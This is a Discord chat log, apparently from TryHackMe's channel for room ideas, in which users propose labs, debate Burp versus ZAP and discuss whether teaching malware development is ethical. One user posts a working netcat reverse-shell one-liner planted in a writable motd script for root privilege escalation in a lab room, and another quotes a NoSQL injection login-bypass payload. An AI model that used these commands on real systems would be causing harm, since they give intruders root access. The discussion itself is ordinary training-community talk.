Wym the room creator just needs to make a machine with the username of the normal user named "root", u can't do that?

I dont think so. Its probably reserved, that being said cant say I've ever tried but seems like it would def cause issues

It's possible, but it's also really fricken' stupid 😆

If you're going to troll in box dev, do it with class or it's just tacky. Cheap tricks don't tend to get passed review 🤷‍♂️

I suppose it goes by uid

Darn guess I'll have to rethink my box then

Nah, UID is the bit that can be duplicated. To use root as another account name you would need to change the name of the real root account iirc

And I doubt you've gone tacky smh

Well first I need to dev the damn box

Hi. i just finished the Nosqlinjection room yesterday.

but i'm still wondered how all those injection payloads lead to a valid mongodb query.

e.g when bypassing the login we use => user[$ne]=ases&pass[$ne]=eue

This channel is foe suggesting new tryhackme rooms

in my opinion new CVE's must be demonstrated like the one discovered against exchange servers & that sudoers flaw that was discovered last year so we'll have the idea how pentesters found and exploit it

https://github.com/ggerganov/kbd-audio/discussions/31 keyboard eavesdropping via audio recording

Good night!

I'm looking forward to making an Samba exploitation room any thought on that?

Hello!! Been looking around for courses in coding skills for ethical hackers. Will be awesome to see a learning path covering various languages focused in a security perspective like: C# (for developing Windows hacking tools), Javascript (for webapps and advanced XSS), ruby (for webapps scripting exploits), C/C++ (exploit development), Java and Swift (for mobile apps) and the old good classics (python, bash, powershell).

go on at udemy

TheXSSRat makes awesome content on XSS

I've been toying with the idea, there are a few rooms on scripting though already

A windows services room, like those kinda new rooms but for windows, could also work for aoc3

Becoming A Super Admin In Someone Elses Gsuite Organization And Taking It Over

https://secreltyhiddenwriteups.blogspot.com/2021/11/becoming-super-admin-in-someone-elses.html

How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

https://0xmahmoudjo0.medium.com/how-i-found-multiple-sql-injection-with-ffuf-and-sqlmap-in-a-few-minutes-9c3bb3780e8f

nice idea tho 💯

Would also like to see more coding rooms intergrated with hacking

What about creating a path for cyber forensics? or more rooms of this topic? I don't see many people doing this so it would be huge for tryhackme I guess, I would pay more money for my subscription if needed

Have you looked at the squid game room?

Is there any interest in more Blue Team type of rooms? For example, how to secure your OS & Apps to DoD standards?

There's an entire team of Blue Team content devs 😄

Plenty more Blue Team content coming soon™️

I'd like to contribute to that Blue Team content 😉

I am working on a room for using the DoD STIG to secure your OS and/or App; but wasn't sure if that would step on any existing rooms

Mainly because I get asked about it enough, I'd rather build a room once and point folks to it (BSides events, etc).

Don't want to put something out there that's already in the works though

Check out the blue team pathway -- that's got a plan of a lot of the currently planned blue team walkthroughs. If it's not in there then it's probably a good one to go with :)

I don't see anything about configuring the security posture of your OS, App, Device, etc, in Threat and Vulnerability Management (or anywhere else in the path) Seems like nobody has covered how to secure it before you put it on the Network lol

Appreciate the advice @native raptor , I'll keep working on the room and see if it has a fit anywhere.

Hardening Basics 1 & 2

Do you have a link for those rooms? I'll do some searching, I'm sure I can find them; thanks!

Of course I'm not on a subscription right now, so that makes it hard to view the room contents haha

That covers very specific Ubuntu configurations and some firewall topics, but not an actual framework to use for any OS, web app, firewall, router, etc. Good rooms though! What I'm working on would be on the same topic, just a more extensive review of the topic.

@karmic raven Could I DM you the introduction text of the room, see if it would fit?

You can but I can’t promise I’ll look at it, I’m very busy

I will take a look, thanks!

Gave +1 Rep to @cedar echo

Yeah, but it's all about purple team

Cuz purple is better, I think

How exactly?

Oh, I was just making a commentary on how it's all the rage right now

Probably for good reason though, as it drives active results

Integer overflows

Hello, i have created a room 10 days ago. And i am waiting for the possibility to became Public. How much time do i have to wait ?

It goes into the review queue.
There's no fixed time.
It also may be rejected - not made public.

Alright.
Even if it stays private, it can be accessible with the link dedicated ?

With the jr link yes.

Thank you 💯
@somber crow

Gave +1 Rep to @somber crow

I'd love some more OSINT rooms

Maybe a Security Onion room? I don't know if it's possible. But you can really get lost in that if you don't know what you're doing 🙂

Android petesting room. Most of us don't have powerful computers to emulate android environment for practice, if you can make an online machine it would be great.

2. Room on wine windows exe runner for linux. I want to do buffer overflow without testing on seperate windows environment instead using wine on my same kalil machine.

Any kind of low level stuff (including compilation) should match the target environment as closely as possible. Doing buffer overflows on Wine would not be sensible.

Qemu ain't exactly heavy, although more mobile stuff would be nice

I wasn't just talking about buffoverflow but also other ised of wine in pentesting

Again, as a general rule, it isn't used.
Wine is old, and only emulates x86 to boot.
It is used by hobbyists emulating Windows programs on Linux for fun.

In a professional environment you would have access to Windows directly, which is what you would (and should) be using.

No point in teaching things that won't help professionally 🤷‍♂️

CSV Injection room?

Hi

A Port Knocking room based around a shop that sells Doors

Ew, not more port knocking

more rooms on owasp zap

covering anything specific?

well learning how to use it for all of the basic stuffs in comparison to how the burp module teaches you burp

and then some more advanced stuff after that

Remember that Burp is the industry standard for a reason. Zap is... lacking.

I.e. head honchos are not going to commission content on a tool that won't be used professionally (except in very rare circumstances)

What reasons??? Being paid and having more info available??

Being a lot more fully featured, a lot less buggy, a lot easier to use, and yes, having more support available.

Burp Pro especially is infinitely more powerful than Zap.
Burp Community is arguably on a similar level, but even then it's still more stable

shadow finds zap more fully featured then burp community, buggy yes because it crashes if shadow tries to set it to dark theme, easier to use is up to preference, more support is a definite thingy....
just having more options for how to do things is very helpful as it also helps in understanding how things work on a deeper level...
burp pro might be the best but nearly each and every tryhackme user are not going to get it just for personal use and probably putting it as a business expense for more strongly targeted pentesting and not ctfs

Those weren't reasons for individuals preferring one or the other. Those were reasons why Burp is the industry standard.
Prefer whichever you like -- there's no point in paying large amounts of money to develop content on tools that are not used in industry.

fair

shadow is more trying to debate why zap could become more like industry standard if there was more information available

but this channel is probably not for that so lets just drop it and see if someone is willing to do more owasp zap rooms if they want

Quite simply? Portswigger have more money to spend on development 🤷‍♂️

And you said it yourself -- Zap is unstable. Burp is not.

well shadow has got burp to hang and crash before too but not as relaiably as zap with changing to dark mode

I mean, it's possible to get GDB to segfault 🤷‍♂️
You can make anything crash if you try hard enough

magic sysrq for the win

Haha
Burp's project feature certainly is

Hi, it would be great if there was a learning Path for Reverse Engineering, which includes C/C++ basics to advance, then assembly basics and intro to memmories and basics of reverse engineering to advance

Hello, Are there any plans for an OSCP prep path?

OSCP prep was rebranded into offensive pentesting iirc

@modest trail Ah, Thank you for the info

Gave +1 Rep to @modest trail

Hi guys I really love THM and would love to see some Hardware hacking rooms, atleast the basics other than assembly !! is there any plans on it

using procdump to harvest credentials from lsass.exe both with/without mimikatz would be a very sicc room

Is that possible to create room with IDE like editor like on https://tryhackme.com/room/pythonbasics but for other languages?

ish. Its just an iframe. So theoretically any online IDE can be used

yes but the iframe is https://static-labs.tryhackme.cloud/sites/programming/python/intro-to-python/ I mean not any content creator can create it, it was made by THM staff
Seems it's not a true server-side python interpreter here but a pseudo one in javascript client-side right?
So if I want to create a similar room for another language, how could I have a similar side panel?

You would need to communicate with one of the staff members to add it for you. It can be pretty much any site though

Thanks. Ok cool 🙂

Gave +1 Rep to @karmic raven

You guys should add a room for people to show off there PC setups. It might be cool

that doesn't feel productive...oh you mean a discord channel?

this is for THM room ideas

Oh okay! i was thinking room as in discord channel

a mock dsp hacking room - something like a QSC DSP. compromise the shell, interact with the program to record audio (simulated) -- listen to audio for clues -- simulating eavesdropping on a conference or something

Hi guys ! I wanted to share with you and alternative way of privesc on BountyHacker room

All the writeups point at beeing able to run 'tar' as sudo

however, you can also attack the fact that /etc/update-motd.d/00-header is writable

so you run the following command

echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc $IP $PORT >/tmp/p' > /etc/update-motd.d/00-header

being $IP your atacking IP machine and $PORT whichever port you want to listen on

then you start a netcat listener on your machine on the specified port

and you log with ssh again on the atacked machine and you have a reverse shell as root on your machine

maybe make a thread ?
its a good idea ngl , like we have a thread for frog xD

Write it up properly and submit to the room

Eh why not?

Maybe once I get home, mobile sucks for threads

i have an idea

what if the koth page doesnt show what machine it is running

but the players have to figure it out

@sturdy bramble That makes very little difference. You'd find it out in a few seconds of port scanning

how abt random ports ??

Some of the KoTH machines have that, but it's a lot of work to build dynamic KoTH machines. You'd need a whole new set for that.

like fortune ??

Fortune, Hogwarts, and Hackers are all dynamic machines

Could we get an option of switching to 'Dark Mode' on the website? Would really help and save our eyes...

Use darkreader.
This channel is for suggesting new rooms.
#feedback-and-ideas has a form for site suggestions

room that uses CVE-2021-44228(log4j exploit thingy) to attack a server of minecraft or some other application in some way....

log4j (log 4 java) is for java in general not just minecraft, so it would be nice to have one about that.

Incoming 😄

true just felt that the minecraft way felt like a nice interesting one as you can do it from the chat messages inside the game

true

one of my friends actually made a YouTube video demonstrating the use of the exploit in minecaft.
Its quite powerfull

also nice as this kinda sounds like a confirmation that someone wants to work on this kinda room

It may or may not have already been assigned

It may or may not be in progress

Hey, I was wondering if it would be cool to have an AoC type of event with increasing difficulty per challenge?

HOTH was the event that THM did which had increasingly harder rooms.

As TryHackMe is a beginner learning platform, usually the events that we have are beginner friendly. While I do love to see people tackle really hard challenges, in my opinion I’d prefer if everyone could have a chance at the rewards from an event, especially if the rewards are similar to the ones given out at AOC.

I mean, it could be without rewards.. just for the challenge as is

I suppose that would be just another room/CTF

So yes, I didnt think this through as far as I think I did 😅

are there any rooms that go through the process of finding an exploit?

Basically any of the rooms with custom applications

https://tryhackme.com/room/hipflask is one of my walkthroughs that does it

cool thanks, will join it in a minute

@native raptor just reading over it and it looks be exactly what i was looking for, thanks 🙂

Gave +1 Rep to @native raptor

Np 🙂

Why are there no badges for completing paths ?

Good question.

#feedback-and-ideas
This channel is for suggesting new tryhackme rooms

ok, sent 👍

i am an AWS Community Builder and i have a room idea that i wanna work on but i need a mentor
who should i contact

mentor for what?

mentor to guide me while making the room

maybe we can make a learning track

.

Who could I contact with about "Intro to Pwntools" room? @graceful crane I have several ideas I think would improve the room and make it even more worthwhile for beginners

Hi friend, I am the creator for that room. I am not planning on implementing any changes. Still, I am happy to listen to constructive feedback.

Hello, just wondering if there is a cloud basics or cloud sec PATH in the works?

Mayyyyyybe

cool 🙂 I would be super interested in that

Hi guys i'm in interested in building a room. I just have a quick question. If ever I get to export a vm then I'm working on creating a vulnerable website then place the website in the html/www/var directory from where usually we can deploy a site using a server. Then should I just go and upload the vm in tryhackme? I'm still pretty new with the process of creating a room but very interested in creating one. Thanks. 🙂

Apache will deploy from /var/www/html on Ubuntu systems. If you're using Apache and you put a site there it will be served, yes. It's up to you to make sure that it works.

And yes, when it's ready, just export to .ova and upload

Thank you. Going to try this out. 🙂

Gave +1 Rep to @native raptor

https://tryhackme.com/room/rpmetasploit --> quite outdated. Would be willing to work together to update it to work with the latest MSF

Task 5 needs some reworking, as well as some answers for Task 7

That room is already updated and separated into three others

"Updated" may not be the correct word there considering it's still using MSF5...

But yeah, RPMetasploit is EOL @plain dawn

A room about how to make rooms on THM

Pretty sure about three people have tried that already

I, uh, can't remember what happened

Thanks for the context!

so the faq is not good enough on how to make rooms then???

or john hammonds video where he creates a room???

I don't know if we need a room to explain how to make rooms, but better documentation, and clearly set expectations would be nice. I was surprised to find that when you submit a room it can take weeks if not longer just to have it reviewed and published.

Does during AoC

If there was a paid room review team then setting expectations would make sense.

What kind of expectations are you referring to? As to the review time, this is due to both internal factors as well as test availability.

Ya. That isn’t documented anywhere. I wrote a log4j challenge room and submitted it before others, and mine hasn’t even been looked at a week later. I understand the backlog now, but at the time, based on what I read to build the room I had no idea that it could take weeks if not longer to release room on THMs schedule. I’m not bitter or anything, but had I known my room wouldn’t be accessible publicly for weeks I wouldn’t have rushed to complete it.

I was trying to add value to THM during a time when log4j was in the media.

Anyways, just an unexpected bump in the road. I know for the future. Would be nice if that was better explained in the room docs to better align expectations.

What is the expectation though, that you know how long it is going to take?

From what I gather it’s the time to review which is based on backlog, holiday schedules, room tester availability and what not… PLUS scheduling by THM on the release itself.

I still don’t know what is a “reasonable” time yet. I’ve been contacted and told they will be reviewing my room next week. I dunno if that’s early or late. I ASSUMED a typical release is a few days from setting to public. That was a bad assumption on my part. With no clear guidance it’s hard to gauge. I think docs with “best effort” timelines would be helpful.

As I think about the past, normally you guys release a couple of rooms a week, except during AoC. It’s unrealistic if room dev gets popular to expect a room to be released in a week or two. I could imagine your backlog getting far bigger and delays far longer at this pace. But there’s no guidance in any direction of what to expect.

Maybe in the FAQ just add “we typically review and publish new community-built room in X weeks, except during the holidays/AoC”

If that’s reasonable timeline.

Given the variables, it is hard to estimate. Also, the process itself is in transition. I will take these points into consideration though. I appreciate your input. 🙂

No problem. I can envision this will get more complicated as more rooms get submitted and the community grows. If I can help in any way, let me know.

As it stands, I need more rooms published. I’ve only got a handful left to do and It’s gonna break my streak to 365. lol

That's a case of having become the victim of your own success (completing all the rooms). 😄

Hehehe, it's actually less of an issue now than it used to be. Earlier this year we had about 6 weeks of rooms ready for release queued up and scheduled 😆
Testing time was the least of the worry

Requirements have been tightened a bit since which has raised the quality and reduced the backlog though

i do my night boxes on https://parrot-ctfs.com bc thm honestly hurts my eyes lol

Use dark reader...

Anyone create room for how to create malware

For what purpose/ goal would you like to achieve with such room?

It helps me to identify what are the new vectors does attacker used the system resource to do in wrong way

But you could do that in a room that reverses malware, right?

Teaching users to create malware is an ethical dilemma for TryHackMe imo

Sure I will check that room, thanks for sharing ☺️ & I totally newbie in this concept

Gave +1 Rep to @icy trellis

Isn’t everything we’re taught an ethical dilemma? 😂

Yes, but it is about justification.
Think about the word "malware", it's simply a portmanteau of "malicious" and "software".

I dunno @icy trellis , I think the idea behind offensive tradecraft isn't a terrible idea for red team operators. We need to understand how to defeat security controls to conduct our work. I write exploits as part of my job. You may call them "malware" because I am getting around things by maliciously affecting how the system and apps work. When denotated though, it doesn't do PERMANENT or DESTRUCTIVE harm, unless its specifically in scope to do so. I don't believe we should be teaching how to HARM things, but I do think things like AV/AM evasion, AMSI bypass, ROP chaining and SEH protection bypass are all valuable pursuits in learning.

Malware and exploits are not the same lmao

Thing is, there are far more groundwork that has to be instilled in people before fretting about this. Most don't even know how to do basic overflows to get to that point.

Are you trying to tell me an exploit with a payload to do something to interrupt the way a computer or app functions that DOESN'T cause permanent damage ISN'T malware?

You’re taking this so far out of scope.

The original question was if THM should teach techniques for writing malware. It wasn't about writing criminalistic payloads for monetary gain.

Malware, according to the studying I did for Comptia Sec+, is usually created for monetary gain, damage or for a botnet system

Just because you create or use an exploit that unintentionally damages the system, doesn’t mean that you’re making malicious software to purposely damage someone’s computer

The idea of learning how to write custom shellcode for an RCE is a form of malware. That's not a bad thing if you are teaching how to defeat security controls under that scope.

If you actually step back and read why the user wanted malware rooms, you will understand

No. Malware is any software intentionally designed to cause disruption to a digital system, or otherwise infiltrate or exfiltrate data or resources from a target without the target's knowledge or consent.

I’m honestly done with this conversation, you’re ignorant and taking it out of scope.

Rooms that specialise in malware are very ethically problematic and not a path that TryHackMe should go down.

If you would like to continue this “discussion” take it elsewhere.

Wow. OK. Disappointing. But that's your choice. Why promote red team stuff, binary exploitation and even phishing if you aren't going to actually allow teaching of the fundamentals on writing shellcode, evasion and bypasses. I digress. I'll shutup now.

I would agree, but I wouldn't call that malware

Rooms teaching offensive tradecraft I can get behind. Rooms teaching malware dev (which is inherently malicious -- it's literally in the name) are a whole other story. By definition the intention behind malware is to cause damage

Important distinction to make. The former is worth doing. The latter is criminal

Ya, I was never insinuating THM should teach criminalistic behavior. But foundational learning on what we do on red team like evasion and bypass, for the sake of understanding the weaknesses in security controls should be fair game.

I have some ideas on room creation I wanna do on things like showing how to defeat ASLR with fuzzing for address leakage, or how to do AMSI/ bypassing to defeat default controls on more modern Windows. I’d hate to do that work and get denied because it’s used in malware.

Does anyone have any links to making your own room on Tryhackme. I have been interested in making rooms.

there's a video by John Hammond on YouTube.

has anyone made a room on "hashcat on google colab"? If not Id like to make one if possible
why ?
because its really fast

is it actually fast?

I have an I7u 7th gen cpu
AMD radeon rx 500 gpu
16 ram
(laptop)
some hash took me ~20 min to crack (not a vm), it took hashcat 1:40 min

running it on gpu took you 20 mins?

yes

hmm

Mobile GPU though...

?

Hi

Has there been discussion about more mobile sec/app sec rooms being introduced? I work in Mobile App Security and would love to know how to contribute.

Integer overflow!

anyone have pointers for hacking Greenpass/NHS qr code ?

Why do you want to do that?

i want to learn how to encode. Github had some repos on decoding

So you want to fake the passes?

i want to experiment

For what goal?

for knowledge

-ban @marsh anvil Trying to forge NHS covid passes, this is dangerous and illegal. People die from covid. Ban appeals are bans@tryhackme.com

🔨 Banned MarcoReus11#8554 indefinitely

HAMMER TIME!!!

Please don't, not overly helpful.

sorry

Is it bad that that (stupid) request now makes me wonder about the tech and security of such authentication systems? I think some are a private/public key setup that requires rhe private to decode info from a public database? I think Estonia and India both have/tried respectively digital national ID systems. Facebook is likely looking into such too. I was surprised to find that Japan is trying to get rid of Hankos not switch to digital ones.

Anyway - a room on how physical authentication handshakes/verification work? Or is that too topical and not hackery?

Is it bad that that (stupid) request now makes me wonder about the tech and security of such authentication systems? I think some are a private/public key setup that requires rhe private to decode info from a public database? The majority are basically JWT. Secure as long as the keys are kept secure.

The challenge for anything physical security related is making it interactive.

i am stuck at converting process of my vm machine
can anyone help!

did you check the pre-reqs? exactly what image did you use?

i checked the pre-reqs. but I think the pre-req are only for suggesting os versions. and bytheway I used Ubuntu 20.04

Desktop or server?

I think desktop

Then there's your problem

how?

It's not supported.